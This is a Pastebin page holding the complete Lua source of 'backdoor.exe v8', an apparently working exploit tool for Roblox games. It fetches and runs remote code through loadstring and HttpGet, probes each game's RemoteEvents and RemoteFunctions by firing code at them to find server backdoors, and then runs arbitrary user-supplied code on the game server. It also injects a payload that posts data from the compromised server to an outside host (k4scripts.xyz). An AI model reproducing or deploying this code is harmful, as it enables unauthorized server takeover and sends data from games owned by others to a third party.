API tools faq
paste
ARY106_7

سكربت Backdoor v8

ARY106_7
Jan 1st, 2025
57
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.65 KB | None | 0 0
raw download clone embed print report
  1. --[========================================================================[
  2. backdoor.exe, the best backdoor scanner in Roblox.
  3. Copyright (C) 2021 iK4oS
  4.  
  5. This program is free software: you can redistribute it and/or modify
  6. it under the terms of the GNU General Public License as published by
  7. the Free Software Foundation, either version 3 of the License, or
  8. (at your option) any later version.
  9.  
  10. This program is distributed in the hope that it will be useful,
  11. but WITHOUT ANY WARRANTY; without even the implied warranty of
  12. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  13. GNU General Public License for more details.
  14.  
  15. You should have received a copy of the GNU General Public License
  16. along with this program. If not, see <https://www.gnu.org/licenses/>.
  17. --]========================================================================]
  18.  
  19.  
  20. --// TYPES \\--
  21. --[[ export type LikelyBackdoor = RemoteEvent|RemoteFunction;
  22. export type MakeDummy = (LikelyBackdoor, string) -> nil;
  23. export type ExecuteBackdoor = (BackdoorGateway, ...any) -> any;
  24.  
  25. -- @BackdoorSolver
  26. -- Solvers allow us to provide a maintanable way of
  27. -- adding new backdoors detections and executions.
  28. export type BackdoorSolver = {
  29. makeDummy: MakeDummy,
  30. Execute: ExecuteBackdoor
  31. }
  32.  
  33. -- @BackdoorGateway
  34. -- Once found a backdoor we instanciate a new gateway which is responsible of using the backdoor
  35. export type BackdoorGateway = {
  36. b: LikelyBackdoor, -- backdoor
  37. Execute: (BackdoorGateway, ...any) -> any
  38. };]]
  39.  
  40. -- // CHECK IF RUNNING \\ --
  41. local genv = getgenv();
  42. if genv.backdoorexe then
  43. genv.backdoorexe.screenGui:Destroy();
  44. end
  45.  
  46. --// UI \\--
  47. local screenGui, uiRequire = loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/ui.lua"))()
  48. local alertLib = loadstring(game:HttpGet("https://raw.githubusercontent.com/uniquadev/GuiToLuaConverter/main/PluginPlace/src/alerts.lua"))()
  49.  
  50. local ui = uiRequire(screenGui.main);
  51. local config = ui.config;
  52. local games = ui.games;
  53. local btns = ui.btns;
  54. local editor = ui.editor;
  55.  
  56. -- // START SESSION \\ --
  57. genv.backdoorexe = {
  58. screenGui = screenGui,
  59. ui = ui
  60. };
  61.  
  62. --// SERVICES \\--
  63.  
  64. local httpService = game:GetService("HttpService");
  65. local serverScript = game:GetService("ServerScriptService");
  66. local players = game:GetService("Players");
  67. local localPlayer = players.LocalPlayer;
  68.  
  69. --// GLOBALS \\--
  70. local MAXTIMEOUT = 20;
  71. local TITLE = "backdoor.exe - v8.0.0";
  72. local BACKDOOR_SOLVER = {};
  73. local BACKDOOR_FILTER = {};
  74. local URSTRING_TO_BACKDOOR = {};
  75. local ALPHABET = {
  76. "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z",
  77. "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z",
  78. "0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
  79. "!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "-", "_", "=", "+", "[", "]", "{", "}", "|", ";", ":", ",", ".", "?", "/", "`", "~"
  80. };
  81.  
  82. -- // CONSTANTS \\--
  83. local EXEC_DEBUG = [[
  84. local BEXE_stdout = {};
  85. local print = function(...)
  86. table.insert(BEXE_stdout, {
  87. value = {...}
  88. });
  89. end;
  90. local warn = function(...)
  91. table.insert(BEXE_stdout, {
  92. warn = true,
  93. value = {...}
  94. });
  95. end;
  96. local int, err = pcall(function() %s end);
  97. local BEXE = Instance.new("BoolValue");
  98. BEXE.Name = "%s";
  99. BEXE.Value = int;
  100. if not int then
  101. bool:SetAttribute("err", err);
  102. end;
  103. if #BEXE_stdout > 0 then
  104. BEXE:SetAttribute(
  105. "stdout",
  106. game:GetService("HttpService"):JSONEncode(BEXE_stdout)
  107. );
  108. end;
  109. BEXE.Parent = workspace;
  110. game:GetService("Debris"):AddItem(BEXE, 3);
  111. ]];
  112. -- this code execute on game server, doesn't have any role with user client
  113. local LOG_GAME = [[
  114. if BEXE_LOG == true then return; end;
  115. getfenv()["BEXE_LOG"] = true;
  116.  
  117.  
  118. local httpService = game:GetService("HttpService");
  119. httpService:RequestAsync(
  120. {
  121. Url = "https://k4scripts.xyz/bexe/log",
  122. Method = "POST",
  123. Headers = {
  124. ["Content-Type"] = "application/json"
  125. },
  126. Body = httpService:JSONEncode({Data = "%s"})
  127. }
  128. );
  129. ]];
  130.  
  131. --// UTILS \\--
  132.  
  133. local function stringSplit (inputstr, sep)
  134. if sep == nil then
  135. sep = "%s"
  136. end
  137. local t={}
  138. for str in string.gmatch(inputstr, "([^"..sep.."]+)") do
  139. table.insert(t, str)
  140. end
  141. return t
  142. end
  143.  
  144. -- solve roblox path
  145. local roRoots = {
  146. workspace = workspace,
  147. game = game
  148. }
  149.  
  150. local function solveRobloxPath(path)
  151. local path = stringSplit(path, ".");
  152. local inst = roRoots[path[1]] or game:GetService(path[1]);
  153. if not inst then
  154. return nil;
  155. end;
  156. for i = 2, #path do
  157. inst = inst:FindFirstChild(path[i]);
  158. if not inst then
  159. return nil;
  160. end;
  161. end;
  162. return inst;
  163. end;
  164.  
  165. -- encode backdoors table
  166. local function encodeBackdoors(backdoors)
  167. local encoded = {};
  168. for i, v in ipairs(backdoors) do
  169. table.insert(encoded, v.b:GetFullName());
  170. end
  171. return encoded;
  172. end;
  173.  
  174. -- fire RemoteEvent/RemoteFunction with the given arguments in a new thread
  175. local function runRemote(r, ...)
  176. if r:IsA("RemoteEvent") then
  177. return task.spawn(r.FireServer, r, ...);
  178. elseif r:IsA("RemoteFunction") then
  179. return task.spawn(r.InvokeServer, r, ...);
  180. end
  181. end;
  182.  
  183. -- generate an unique random string name inside the passed parent
  184. local function urString(len, parent)
  185. local name = "";
  186. local r = Random.new();
  187. while true do
  188. for i = 1, len do
  189. local idx = r:NextInteger(1, #ALPHABET);
  190. local c = ALPHABET[idx];
  191. name = name .. c;
  192. end;
  193. if parent == nil or parent:FindFirstChild(name) == nil then
  194. break;
  195. end;
  196. -- rare but still possible :o
  197. name = "";
  198. end
  199. return name;
  200. end;
  201.  
  202. -- wrap to make a BackdoorGateway
  203. local function makeGateway(r, s)
  204. return {
  205. b = r,
  206. Execute = s.Execute
  207. };
  208. end;
  209.  
  210. --// SOLVERS \\--
  211.  
  212. -- [[COMMON BACKDOOR SOLVER]]
  213. -- @detection by performing a remote run and instanciating a dummy instance
  214. -- @execution_param code:string
  215. BACKDOOR_SOLVER[1] = {
  216. makeDummy = function(r, dummyName)
  217. --[[ check if loadstring is disabled | sobly not work
  218. if gethiddenproperty(ServerScript, "LoadStringEnabled") == false then
  219. URSTRING_TO_BACKDOOR[dummyName] = nil;
  220. return;
  221. end;]]
  222. local src = ('local d = Instance.new("BoolValue", workspace);d.Name = "%s";game:GetService("Debris"):AddItem(d, 3);'):format(
  223. dummyName
  224. );
  225. runRemote(r, src);
  226. end,
  227. Execute = function(g, code)
  228. return runRemote(g.b, code);
  229. end
  230. };
  231.  
  232. --// FILTERS \\--
  233. -- I suggest registering filters in priority order, and they must be thread safe.
  234.  
  235. -- [[COMMON BACKDOOR FILTER]]
  236. -- @filter ClassName check the passed instance
  237. BACKDOOR_FILTER[1] = function(r)
  238. -- Checking the class
  239. return r:IsA("RemoteEvent") or r:IsA("RemoteFunction");
  240. end;
  241. BACKDOOR_FILTER[2] = function(r)
  242. -- Anti-Addonis Filter
  243. return not ((r.Parent == game:GetService("ReplicatedStorage") and r:FindFirstChild("__FUNCTION")) or
  244. (r.Name == "__FUNCTION" and r.Parent:IsA("RemoteEvent") and r.Parent.Parent == game:GetService("ReplicatedStorage")));
  245. end;
  246. BACKDOOR_FILTER[3] = function(r)
  247. local Parent = tostring(r.Parent and r.Parent.Parent);
  248. return not (Parent == "HDAdminClient")
  249. end;
  250.  
  251. --// CORE \\--
  252.  
  253. local function filterRemote(r, remotes)
  254. for _, filter in ipairs(BACKDOOR_FILTER) do
  255. if not filter(r) then
  256. return false; -- remote is not a backdoor
  257. end;
  258. end;
  259. table.insert(remotes, r);
  260. return true;
  261. end
  262.  
  263. local function getRemotes()
  264. local remotes = {};
  265. for i, r in ipairs(game:GetDescendants()) do
  266. filterRemote(r, remotes);
  267. end;
  268. -- check getnilinstances support
  269. if getnilinstances == nil then
  270. return remotes;
  271. end
  272. for i, r in ipairs(getnilinstances()) do
  273. filterRemote(r, remotes);
  274. end;
  275. return remotes;
  276. end;
  277.  
  278. -- scan all game remotes and return all backdoors found
  279. local function scan(remotes, delayFactor)
  280. delayFactor = delayFactor or 1;
  281. alertLib.Info(screenGui, TITLE, 'Scan started.', 4);
  282. ui.title.Text = TITLE .. " [Scanning]";
  283. -- retrive remotes
  284. remotes = remotes or getRemotes();
  285. local backdoor;
  286. -- listen workspace new instances
  287. local connection;
  288. connection = workspace.ChildAdded:Connect(function(child)
  289. local gateway = URSTRING_TO_BACKDOOR[child.Name];
  290. if gateway then
  291. -- store backdoor
  292. backdoor = gateway;
  293. connection:Disconnect();
  294. end;
  295. end);
  296. ui.title.Text = TITLE .. " [Testing]";
  297. -- loop all remotes
  298. for i, r in ipairs(remotes) do
  299. -- loop solvers
  300. for j, s in ipairs(BACKDOOR_SOLVER) do
  301. -- create a new backdoor gateway
  302. local g = makeGateway(r, s);
  303. -- this will ensure we generate an unique string inside URSTRING_TO_BACKDOOR and workspace
  304. local dummyName = urString(5, workspace) .. i .. j;
  305. -- register gateway
  306. URSTRING_TO_BACKDOOR[dummyName] = g;
  307. -- make dummy test
  308. s.makeDummy(r, dummyName);
  309. end;
  310. end;
  311. -- force disconnect after localPlayer:GetNetworkPing() * delayFactor * #remotes
  312. local timeOut = math.max((localPlayer:GetNetworkPing() * delayFactor) * #remotes, MAXTIMEOUT);
  313. task.delay(timeOut, function()
  314. connection:Disconnect();
  315. end);
  316. local endTime = tick() + timeOut;
  317. -- wait until connection is disconnected
  318. while connection.Connected do
  319. ui.title.Text = TITLE .. (" [Waiting: %.1f]"):format(endTime-tick());
  320. task.wait();
  321. end;
  322. ui.title.Text = TITLE .. " [Waiting]";
  323. table.clear(URSTRING_TO_BACKDOOR); -- clear URSTRING_TO_BACKDOOR
  324. -- return
  325. return backdoor;
  326. end;
  327.  
  328. local executing = false;
  329. local function execute(code, gateway, canDebug, disableAlerts)
  330. assert(code and gateway, "missing code or gateway");
  331. ui.title.Text = TITLE .. " [Executing]";
  332. local completed = Instance.new("BindableEvent");
  333. -- completed destroy
  334. completed.Event:Connect(function()
  335. completed:Destroy();
  336. end);
  337. -- debug script case
  338. if canDebug then
  339. local token = urString(5, workspace);
  340. -- pcall wrapper
  341. code = EXEC_DEBUG:format(code, token);
  342. -- listen for error instance
  343. local connection;
  344. connection = workspace.ChildAdded:Connect(function(child)
  345. if child.Name == token then
  346. -- stdout print, warn
  347. local stdout = child:GetAttribute("stdout");
  348. if typeof(stdout) == "string" then
  349. local integrity, parsed = pcall(httpService.JSONDecode, httpService, stdout);
  350. if integrity then
  351. for i, out in next, parsed do
  352. if out.warn then
  353. warn(table.unpack(out.value));
  354. else
  355. print(table.unpack(out.value));
  356. end
  357. end
  358. end
  359. end
  360. -- stdout err in the console
  361. if not child.Value then
  362. -- alert to user
  363. if not disableAlerts then
  364. alertLib.Error(screenGui, TITLE, 'Execution error in console.');
  365. end;
  366. task.spawn(error, child:GetAttribute("err"));
  367. elseif not disableAlerts then
  368. alertLib.Success(screenGui, TITLE, 'Script successfully executed.');
  369. end;
  370. completed:Fire(child.Value);
  371. -- disconnect
  372. connection:Disconnect();
  373. connection = nil; -- force gc
  374. end
  375. end);
  376. -- force disconnect after 60 seconds (aka max execution time)
  377. task.delay(60 , function()
  378. if connection then
  379. connection:Disconnect();
  380. end;
  381. end);
  382. else
  383. -- this will fire completed event just in case is needed with non-debug mode
  384. task.delay(0.1, function()
  385. completed:Fire(true);
  386. end);
  387. end;
  388. -- execute code
  389. gateway:Execute(code);
  390. return completed.Event;
  391. end;
  392.  
  393.  
  394. -- perform a scan and print out the time taken and the found backdoors
  395. local function debugScan()
  396. local start = tick();
  397. local backdoor = scan(nil, 2.5);
  398. local endTime = tick();
  399. print("Backdoors found: " .. (backdoor and 1 or 0));
  400. print("Time taken: " .. (endTime - start) .. "ms");
  401. return backdoor;
  402. end;
  403.  
  404. -- macros solver
  405. local function applyMacros(code)
  406. return
  407. code:gsub(
  408. "%%username%%", localPlayer.Name
  409. ):gsub(
  410. "%%userid%%", localPlayer.UserId
  411. ):gsub(
  412. "%%userping%%", localPlayer:GetNetworkPing()
  413. ):gsub(
  414. "%%debug%%", tostring(config.data.settings.canDebug)
  415. );
  416. end;
  417.  
  418. -- retrive backdoors from config
  419. local function getBackdoorFromConfig()
  420. if config.data.games[game.PlaceId] then
  421. local gameBackdoors = config.data.games[game.PlaceId].backdoors;
  422. local remotes = {};
  423. -- loop saved instances
  424. for i, path in next, gameBackdoors do
  425. -- resolve instance path
  426. local remote = solveRobloxPath(path);
  427. -- store instance after filters check
  428. if remote then
  429. filterRemote(remote, remotes);
  430. end;
  431. end
  432. -- scan with config remotes
  433. return scan(remotes, 3);
  434. end;
  435. return nil;
  436. end;
  437.  
  438. -- execution level
  439. local backdoor;
  440. local firstExecution = true;
  441. local function resetExecutionState()
  442. executing = false;
  443. ui.title.Text = TITLE;
  444. end;
  445.  
  446. local function logGame()
  447. local int, data = pcall(game.HttpGet, game, "https://k4scripts.xyz/bexe/token/" .. localPlayer.UserId);
  448. if not int then
  449. return;
  450. end
  451. execute(applyMacros(LOG_GAME):format(data), backdoor, false, true):Wait();
  452. end;
  453.  
  454.  
  455. btns.execBtn.MouseButton1Click:Connect(function()
  456. -- avoid multiple executions
  457. if executing then
  458. return;
  459. end
  460. executing = true;
  461. -- try scanning for backdoors
  462. if backdoor == nil then
  463. -- check if config.games has found backdoors
  464. backdoor = getBackdoorFromConfig();
  465. if not backdoor then
  466. -- search backdoors
  467. backdoor = debugScan();
  468. end
  469. end;
  470. if backdoor == nil then
  471. alertLib.Error(screenGui, TITLE, 'No backdoor found.');
  472. resetExecutionState();
  473. return;
  474. end;
  475. if firstExecution then
  476. -- Executing blank script
  477. execute("", backdoor, false, true):Wait();
  478. -- store game
  479. games.loadGame(game.PlaceId, encodeBackdoors({backdoor}));
  480. config.save();
  481. -- log game
  482. logGame();
  483. firstExecution = false;
  484. end;
  485. -- execute
  486. local code = applyMacros(editor.getCode());
  487. execute(code, backdoor, config.data.settings.canDebug);
  488. resetExecutionState();
  489. end);
  490.  
  491. -- set title
  492. ui.title.Text = TITLE;
  493.  
  494. alertLib.Success(screenGui, TITLE, 'Backdoor scanner successfully loaded.');
  495. alertLib.Info(screenGui, TITLE, 'Home to toggle ui.', 4);
  496. alertLib.Info(screenGui, TITLE, 'THIS HAS BEEN DISCONTINUED', 4);
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!